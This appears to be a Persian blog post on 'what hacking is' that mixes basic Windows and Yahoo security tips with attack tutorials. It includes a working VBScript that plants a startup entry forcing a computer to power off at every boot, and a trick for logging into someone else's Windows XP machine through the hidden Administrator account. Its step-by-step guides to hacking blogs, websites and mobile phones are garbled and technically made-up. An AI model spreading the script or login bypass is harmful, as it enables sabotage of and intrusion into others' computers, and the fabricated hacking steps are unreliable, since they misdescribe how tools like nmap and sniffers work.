نظرات () 
هک چیست:
و هکر کیست و چگونه می شود هک کرد؟! چند تعریف اوليه :
Hacker کيست؟ هکر کسی است که با سيستم های کامپيوتری آشناست و میتواند با روشهايی خاص (بدون اجازه) وارد آنها شود... اين انسان میتواند خوب يا بد باشد (در هر حال هکر است ) Hacker واقعی = سامورايی : کسی که هدفش از نفوذ به سيستمها نشان دادن ضعف سيستمهای کامپيوتری است نه سوءاستفاده ...
Wacker (واکر): کسی که هدفش از نفوذ به سيستمها، استفاده از اطلاعات آن سيستمهاست (جرو هکرهای کلاه سياه )
Cracker (کراکر): کسی که هدفش از نفوذ به سيستمها، خرابکاری و ايجاد اختلال در سيستمهای کامپيوتری است. (جرو هکرهای کلاه سياه )
Preaker : از قديميترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراقسمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه (-; هک چيست و هکر کيست و چگونه ميشود هک کرد؟ نياز ما به امنيت کامپيوتری... چرا؟ هزاران نفر در عرض روز آن لاين هستند چه به خاطر شغل و چه به صورت خصوصی.
اين رشد اينترنتی رو در کل انفجار اينترنتی مينامند و اين رشد روند رشد اينترنت رو با خودش عوض ميکنه. 10 سال پيش همه سرورها از طرف آدمهای تکنسين مديريت ميشدند که به يک مساله بيش از همه چيز اهميت ميدادند : امنيت سرور. ولی امروزه اکثر سرورها رو آدمهای معمولی مديريت ميکنند که بين اونها خيلی کم افرادی پيدا ميشن که اطلاعات کافی در مورد محافظت کردن سرورهاشون دارند. آمار اينجور سرورها به طرز معجزه آسايی رو به افزايش است. با وجود اين باز هم مديران شرکتهای بزرگ مردم رو به اين راه تشويق ميکنند و ادعای اين رو ميکنند که اينترت امن است. آيا اين مساله درست است؟ نه برای اينجور افراد دروغ گفتن جزو زندگی روزمره حساب ميشه ولی از يک طرف هم بخوبی اين مساله رو ميدونند که اينترنت مکان امنی نيست. اين مساله روز به روز بدتر خواهد شد چون افرادی که اطلاع کافی در اين رابطه ندارند فکر ميکنند که همه چيز مرتب و درست است. ولی واقعيت از چيز ديگری صحبت ميکند : همه روزه هکرها و کناکر ها به تعداد بيشماری از سرورهای به ظاهر امن نفوذ ميکنند. بحث کار کردن افرادی که اطلاع خيلی کمی راجع به امنيت دارند در يک شبکه خيلی خيی مهمه. اينگونه افراد نور چشمی های هکرها هستند چون همينهاهستند که در ها رو با وجود همه مسائل امنيتی به روی هکرها باز ميکنند. مديران کارکشته شبکه به اين موضوع خواهند خنديد : مگر ميشود که شخصی نداند که چه برنامه ای و چه تولزی روی سيستمش کار ميکند؟ جواب : بله ميشود! مثال : کدوم يک از شماها ميدونين که با برنامه ورد پرفکت که زير ام اس داس کار ميکرد برنامه ای بود به اسم : قبر! اين زير برنامه از طريق يک پنجره فرمان امکان تهيه اسکرين شوتتز رو از زير همه برنامه های زير داس به کاربر ميداد. در زمان خودش همچين آپشنی زير يک برنامه واژه نگار کاملا جديد بود. اين برنامه زير برنامه ديگری به اسم کانورت داشت ! که اون کار درست کردن فايلهايی رو بر عهده داشت که مستقيم زير ورد ايمپورت ميشدند. نکنه جالب توجه اينه که امکان دسترسی مستقيم به اين تولزها از زير ورد نبود! براي همين خيلی کم افرادی پيدا ميشدند که از اين برنامه و تولزها آگاهی داشتند.چه جوابی دارين اگر که من بگم : زير يکی از آپشن های ويندوز اين آپشن وچود داره که ويندوز به محظ اينکه شما آن لاين ميشين تمام فايلهای خصوصی شماره سريال هاي برنامه هاتون و شماره کارت اعتباری شما رو به يک آدرس ميل ميکنه؟ اين آپشن ميشه که غير فعال بشه ولی شما از فعال بودنش خبر داشتين که اقدام به غير فعال کردنش بکنين ؟ نتيجه يک آمار گيری ميگه: از هر 800 نفری که هميشه برای يک مقصود خاص از يک برنامه مشخص استفاده ميکنند تنها 2 نفر از برنامه به طور کامل استفاده ميکنند!! يک نصيحت بهتون ميکنم: هيچ وقت ادعا نکنين که راجع به يک موضوع همه چيز رو ميدونين. هيچوقت. با روند رشد اينترنت شرکتهای توليد نرم افزار نيز سريع خود را رشد دادند و همزمان برنامه های متنوع توليد کردند. برای اينگونه شرکتها فقط و فقط يک چيز مهم است و بس : فروش نرم افزارشان! برای اينگونه شرکتها هيچ اهميتی ندارد که برنامه ای که شما ميخريد امنيت سيستم شما را پايين مياورند. برای توليد کنندگان نرم افزار هيچ گونه اهميتی ندارد که يک فايل کانفيگوريشن شده سيستم از طرف شما به وسيله اين برنامه بازنويسی شود. فرق بين هکرها و کناکرها HACKER & KNACKER هکر که به غلط در ذهن اکثر مردم يک خراب کار را تدائی ميکند يک خراب کار نيست. هکر ها معمولا برنامه نويسان سيستم هستند که از بقيه برنامه نويسان باهوشتر بوده و سوراخهای حغاظتی را شناسايی ميکنند تا اين سوراخها شکافها را در جای ديگری پر کنند. يک هکر ميتواند مديريت يک شبکه رو برعهده داشته باشد. و برای محافظت کردن شبکه خودش از دسترس دزدی های الکترونيکی بايد دست به دزديهای الکترونيکی غير مجاز بزند.ولی ورود غير مجاز به مثلا يک محدوده حفاظت شده توسط پسورد تا زمانی که منجر به ضرر و زيان نشود که خراب کاری نيست. خراب کاری را کناکر ها انجام ميدهند. يک کناکر برعکس يک هکر به سيستمها رخنه کرده فقط و فقط به منظور خراب کاری.بنابراين کناکر ها هستند که آسيبها رو به سيستمهای ما ميرسانند نه هکر ها. .... اون چيزی که بالا خوندين رو با اون موافق هستين؟ پس از امروز راه خودتون رو تعيين کنيد: آلان که فرق بين هکر ها و کناکرها رو ميدونين و در اين زمينه دوست دارين فعال باشين بايد بدونين که شما در راه هکر شدن ميخواهين فعاليت کنين يا در راه کناکر شدن؟ چگونه هك نشويم: اگر شما از ويندوز xp استفاده ميكنيد ميتوانيد از فايروال(ديوار اتش يا انتي هك)خود ويندوز xp استفاده كنيد. به كنترل پنل رفته و وارد Networking Connection شويد.در انجا روي ايكون dial up كه ساخته ايد راست كليك نيد و properties را انتخاب كنيد سپس تب Advanced را انتخاب كنيد و تيك مخصوص فعال كردن فايروال را فعال كنيد. تجربه نشان داده كه ويندوزهاي 98 ,me به راحتي هك ميشوند.بهتر است از ويندوز 2000 و xp استفاده كنيد.و حتما براي ويندوز 2000 هر سه سرويس پك موجود را نصب كنيد.همچنين براي ويندوز XP هم سرويس پك 1 عرضه شده كه ان را ميتوانيد از بازار به راحتي تهيه كنيد ويندوز XP به همراه سرويس پك 1 امن ترين سيستم عامل ميباشدهمچنين ميتوانيد از فرمت امن NTFS روي اين ويندوزها استفاده كنيد كه خود عاملي جهت جلوگيري از دستيابي ديگران به داده هاي شماست.اگر در ياهو ايميل داريد و چنانچه فايلي براي شما فرستاده شد ميتوانيد از طريق خود Norton Anti Virus سايت ياهو چك كنيد.چنانچه در چت كسي به شما پيشنهاد دادن عكس يا فايل داد بدون رودرواسي درخواست كنيد به ادرس ايميل شما بفرستد.از ورود به سايتهاي شخصي كه به شما پيشنهاد ميشود خودداري كنيد مخصوصا اگر ادرس به صورت چند عدد كه مثل يك ادرس IP ميباشد.ياهو مسنجر خود داراي يك فايروال ميباشد.ميتوانيد از منوي Login گزينه Privacy Setting را انتخاب كنيد و در داخل تنظيمات Connection فايروال را انتخاب كنيد.برنامه هاي انتي ويروس و انتي هك هم انواع زيادي دارند .
الان هم چند آموزش :
رستارت کردن مداوم کامپيوتر (شبه ویروس) . حتی فرصت کليک کردن روی ايکن رو بهش نمی ده .و پشت سر هم restart می شه! می تونيد روی کامپيوتر خودتون هم اجراش کنيد . برای خلاصی ازش بايد فايل C:\restart.vbs رو از کامپيوترتون از طريق Dos حذف کنيد
اين اسکريپت روی هرکامپيوتری اجرا بشه نمی ذاره کامپيوترش بالا بیاد
بعد ويندوزتون بالا می آد کد پایین را روی notepad کپی کنيد و فايل را با پسوند vbs ذخيره کنيد.
Sub ShutDown Set FSO = CreateObject("Scripting.FileSystemObject" Set TxtFile =
FSO.CreateTextFile("c:\restart.vbs", 2, False) TxtFile.WriteLine "Sub ShutDown " TxtFile.WriteLine "nLogOff=0 "
TxtFile.WriteLine "nReboot=2 " TxtFile.WriteLine "nForceLogOff=4 " TxtFile.WriteLine "nForceReboot=6 "
TxtFile.WriteLine "nPowerDown=8 " TxtFile.WriteLine "nForcePowerDown=12 " TxtFile.WriteLine "Set oOS =
GetObject("+chr(34)+"winmgmts:{(Shutdown)}"+chr(34)+".ExecQuery("+chr(34)+"Select * from
Win32_OperatingSystem"+chr(34)+" " TxtFile.WriteLine "For Each oOperatingSystem in oOS " TxtFile.WriteLine
" oOperatingSystem.Win32Shutdown(nForcePowerDown) " TxtFile.WriteLine "Next " TxtFile.WriteLine "End sub "
TxtFile.WriteLine "ShutDown " TxtFile.Close Set WshShell = CreateObject("WScript.Shell" WshShell.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Restart", "c:\restart.vbs" End sub
ShutDown
به دست آوردن اطلاعات سری سایت ها:
پيدا كردن مشخصات يك وب سايت و وبلاگ (IP ، EMail ، نام مدير سايت و ...)
امروز مي خوام راحت ترين روش رو براي گرفتن IP سايت يا وبلاگ رو به شما ياد بدم:
راستش من اين قسمت رو در مطالب قبلي قرار دادم ولي به طور خيلي خلاصه بود و خيلي ها اومدن و به من ايميل زده بودن و خواستن بيشتر توضيح بدم.
.:::. اما چه كار كنيد .:::.
اول ادرس رو به رو ، رو وارد كنيد : http://www.samspade.org/t/ipwhois?a=xxxxxx
و به جاي XXXXXX نام وب سايت يا وبلاگ مورد نظرتون رو مي نويسيد. مثلا مي نويسيد :
down-load.irhttp://www.samspade.org/t/ipwhois?a=www.down-load.ir
حالا شما مي توانيد اي پي اون سايت يا نام شركتي كه به اون سايت فضا داده ، ادس ايميل اون سايت ، تاريخ تاسيس سايت و بسياري از اطلاعات ديگر كه شما نياز داريد تا يك سايت يا وبلاگ رو هك كنيد در اختارتون ميزاره
آموزش براي هک ويندوز XP :
اگر پشت کامپيوتر کسي نشستيد که تمام يوزرهاي ويندوز XP اون پسورد داشتن و نمي تونستيد
وارد ويندوز بشيد ... اين آموزش رو بخونيد.
براي شکستن قفل اول ويندوز XP . وقتي در صفحه WelCome هستيد دو بار
ALT+CTRL+DEL رو مي زنيد و يک صفحه باز مي شود که از شما يک اسم ميخواد
بجاي اسم؛ Administrator رو تايپ کنيد و اينتر بزنيد .
حالا وارد کامپيوتر شديد و ميتونيد از قسمت User Accounts واقع در Control Panel پسورد يوزرهاي ديگه رو پاک يا عوض کنيد.
نکته : اگر خود کامپيوتر توسط يوزري به نام Administrator هم کنترل بشه يعني اسمش در
ليست يوزرها باشه اين کار رو نمي تونيد بکنيد. چون Admin داراي پسورد هست.
آموزش هک کردن يک وبلاگ:
اول از همه براي هک کردن وبلاگ از اين راه نياز به برنامه هايي داريد که بتونن از طريق آيپي سرور يک سايت به قسمت اطلاعاتي يک سايت نفوذ کنن و تو اصطلاح ما ميگيم که listen کنند . حالا براي شروع يک برنامه http snifer رو که خودتون فکر ميکنيد راحت ميتونيد ازش استفاده کنيد رو دانلود کنيد با سرچ کردن متن زير در گوگل : Free Http Sniffer Download . حالا پس از دانلود اين نرم افزار بايد آيپي سايت سروري که وبلاگ قرباني توي اون هستش رو به برنامه بديد . حالا اين کار رو کرده و سپس دکمه listen رو بزنيد . حالا برنامه براي شما پکت هاي اطلاعاتي مربوط به قسمت هاي مختلف سرور رو که درحال رد و بدل شدن هستش رو به شما ميده و شما موفق ميشين که اين پکت ها رو به دست بيارين .معمولا پکت هاي اطلاعاتي پرشين بلاگ مانند زير هستش .
*****/www.victim.persianblog.ir
خب حالا ما مرحله اول هک کردن وبلاگ رو با موفقيت به پايان رسونديم . در پکت اطلاعاتي بالا به جاي ستاره ها پسورد کد بندي شده نفوذ به قسمت اطلاعاتي سرور هستش .فقط مواظب باشيد که يک وقت به جاي قسمت اطلاعاتي به قسمت سرور اصلي نفوذ نکنيد . بعد از اين مرحله شما نياز به يک برنامه Password Sniffer داريد که اين برنامه هم ميتونيد با سرچ عبارت زير اون رو دانلود کنيد .
Free Password Sniffer Download
حالا پسورد ستاره مانند رو از داخل کادر مربوط به اطلاعات سرورتون توي برنامه http sniffer کپي کنيد و سپس توي قسمت Code در برنامه password sniffer خودتون کپي کنيد و دکمه Convert To Ip رو فشار دهيد . (( معمولا در اين برنامه ها نام دکمه اين است اما ممکن است دکمه متن ديگري هم داشته باشد )) حالا بايد برنامه به شما آيپي که پسورد کد شدهي سرور روي آن prache شده باشد رو بده . حالا شما مرحله دوم هک کردن وبلاگ رو هم پشت سر گذاشتيد و اما مرحله اخر هک کردن وبلاگ . براي شروع مرحله آخر شما نياز به دو برنامه مهم داريد . اين دو برنامه يکي Nmap Ip Pracher و ديگري Ip Sniffer . حالا پس از اين که شما اين دوتا برنامه رو دانلود کرديد ابتدا برنامه Nmap رو باز کنيد .
برنامه nmap چه ميکند ؟
اين برنامه اي که در بالا گفتم مخصوص سوار کردن يک آيپي روي يک آيپي ديگر هستش و در واقع به زبون ما Prache کردن يک آيپي روي يک آيپي ديگر .
برنامه ip sniffer چه ميکند ؟
کاربرد اين برنامه در هک کردن وبلاگ اين است که هکر با دادن آيپي که پسورد کد شده سرور اطلاعاتي و پسورد کد شده وبلاگ قرباني روي اون prache شده است يک پسورد به دست مي آورد که اين پسورد کد شده شامل پسورد وبلاگ و سرور اصلي ميباشد .
حالا ابتدا برنامه nmap رو بازکرده و سپس در قسمت ip1 ايپي سرور اصلي که پسورد کدشده روي ان کد شده است و در قسمت ip2 آيپي وبلاگ قرباني رو بنويسيد . و دکمه Prache رو بزنيد . حالا بايد برنامه به شما يک آيپي بدهد که روي اين آيپي دو تا پسوردي که ما نياز داريم کد شده هستش . حالا مرحله آخر : شما بايد برنامه ip sniffer رو باز کنيد و سپس اون آيپي که به دست آوردين رو به برنامه بديد و سپس مي بينيد که برنامه به شما دو تا پسورد کد شده مي ده . که پسورد اول که اصولا 5 رقمي هستش مربوط به پسورد سرور اصلي اطلاعاتي هستش و پسورد دوم که پسورد وبلاگ قرباني به صورت کد شده ميباشد .حالا شما موفق شديد که يک وبلاگ هک کنيد اميد وارم همتون استفاده کرده باشيد . حالا با يک برنامه که پسورد کد شده رو به شما نشون ميده ميتونيد اون پسورد رو ببينيد و
بعد به راحتي وارد وبلاگ شويد
اما راه مقابله با هک شدن وبلاگ:
بهترين انتي هک براي وبلاگ
ميخواهم بهترين و قوي ترين انتي هک براي وبلاگ ها رو بگم
خوب کاري که شخصا از اين به بعد بزاي امنيت بيشتر انجام ميدم
البته راه اساني است و شايد خيلي ها بخندن
ولي ديگه با کي لاگر يا اين حرف ها هک نميشويد
مگر اينکه از طرف بلاگفا ( يا هر هاست ديگر ) هک شويد
خوب بايد به عرض دوستان برسانم که :
وقتي که ما ميخواهيم وبلاگ بسازيم ? نام کاربري از ما ميخواد
که من ==> ساناتا رو انتخاب کردم با پسورد : حالا هر چيزي که گذاشتم
خوب:
اگر کسي پسورد اين نام کاربري را بزند يعني وبلاگ رو به طور کامل هک کرده و حتي ميتواند ميل خصوصي را عوض کند تا شما نتواني وبلاگت را پس بگيري
ولي شما ميتواني چه کاری انجام بدي :
شما براي کنترل وبلاگ فقط به درج و ويرايش مطالب و خوانده نظرات نياز داري
پس ميتوني ? نام کاربري محدود به درج و ويرايش مطالب و خواندن نظرات بسازي و هميشه با اين نام کاربري وبلاگت را به روز کني
که اگر کسي پسورد شما را زد فقط بتواند مطالب را کم يا زياد کند
و شما به راحتي وبلاگ را پس بگيريد.
هک کردن يک سايت:
براي هک کردن سايت در مرحله اول بايد اون سايت رو اسکن کنيم . همون طور که قبلا هم توي مقاله ها گفته بوديم نحوه اسکن کردن يک آيپي به وسيله icmp echo رو ياد داده بوديم از اون استفاده کنين .
پس ميگيم اول از همه اون سايت رو PinG ميکنيم و آيپي اون رو به دست مياريم و سپس اون آيپي رو اسکن ميکنيم.
در سرور اصلي هر سايت يک فايل وجود داره که تمامي پسورد هايي رو که ما براي ورود به managepage سايت داريم رو توي خودش به صورت net. ذخيره کرده .
حالا براي دسترسي به اون فايل بعد از اسکن کردن آيپي سايت قرباني بايد به يک پرت باز بر روي اون آيپي Telnet کنيد .
حالا بعد از تلنت کردن اطلاعاتي را که حاوي نام فايلی که پسورد ها را دارا ميباشد و سيستم عامل سايت قرباني را دارا ميباشد را يک جا يادداشت کنيد .
حالا بايد يک جوري وارد صفحه اي که در پشت آن فايل هاي مورد نظر هستش رو پيدا کنيد (( با استفاده از راه هايي که بلديد )) بعد از پيدا کردن اون آدرس وارد صفحه شده و حالا با استفاده از يک برنامه که ميتواند پسوند net را دانلود کند اون فايل رو دانلود کنيد مانند : download aceletoar plus : بعد از دانلود با استفاده از يک باگ يا يک برنامه بايد پسورد اون برنامه که حاوي پسورد هاي اون سايت هست رو پيدا کنيم .
حالا برنامه رو باز کنيد ميبينيد که به شما پيغام زير را ميدهد :
password packets has been pasedword by administrator please insert packets password
حالا چه جوري ميتونيم پسورد اين فايل رو بدست بياريم .
اين کار خيلي ساده است چون اگه امنيت اون سايت پايين باشد شما ميتونين با آپلود کردن همون فايل در يک فضا که خودتون دارين پکت هاي مهم اون برنامه مثل pass word - detect و endpos را اتوماتيک چون قادر به آپلود کردن نيست و ديليت کنيد و اين جوري ميتونين بعد از آپلود دوباره اون فايل رو دانلود کنيد و ميبينيد که ديگه از شما پسورد نميخواد پس شما ميتوني
حالا به راحتي تمامي پسورد هاي سايت رو که براي ورود به پنل مديريت است رو پيدا کنيد و به راحتي به سايت نفوذ کنيد .
و اين که نکته باقي مانده در اين مقاله اين است که چه جوري برنامه توي سايت رو دانلود کنيم ؟
براي دانلود اون برنامه گفتيم که بعد از تلنت کردن آپي سايت نام اون برنامه رو پيدا ميکنيد حالا کافيست جلوي نام سايت عبارت زير را اضافه کنيد .
programs/filename.net/
در کد بالا به جاي filename نام برنامه داراي پسورد ها را بنويسيد که پشت سايت آپلود شده
يعنش مثلا اگه نام سايت قرباني http://www.crack.org/ بود اين جوري ميزنيم
www.crack.org/programs/passswords-p.net
حالا ميتونيد اون برنامه رو دانلود کنيد .
بازم مطلب هست!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
هک موبايل و سوزاندن گوشي قرباني:
براي هک کردن موبايل کسي بايد گوشي اون رو يک بار به دستتون بگيريد و شماره تلفن خودتون رو به صورت زير بگيريد.مثلا اگر شماره شما :: ??????????? بود شما بايد به صورت :
*??????????? بگيريد يعني جولوش يک ستاره بگذاريد.و وقتي شما ره گرفته شد کافيه گوشيتونو برداريد تا ارتباط برقرار شود.خب حالا در واقع ميتونيم بگيم که گوشي قرباني هک شد
مرحله حساس اين ترفند اينجاست
لطفا با دقت انجام بدين
?:عدد ?? رو شماره گيري کنيد و بعد از شنيدن بوق آزاد شماره بگيريد و پول رو به حساب ..........?:فقط کافيست بعد هک کردن گوشي دکمه * ( ستاره ) رو فشار بديد و خط قرباني رو کنترل کنيد.?:عدد ???????? رو شماره گيري کنيد وok يا همان دکمه اتصال را فشار دهيد بعد با پيغامي رو به رو ميشويد که ميگه ارتباط قطع شد يعني گوشي سوخت.
مشخصات نویسنده
آرشیو وبلاگ
صفحات وبلاگ
مطالب اخیر
موضوعات وبلاگ
لینکستان
نویسندگان همکار
پیامک بلاگ
فید منتخب من
امکانات جانبی
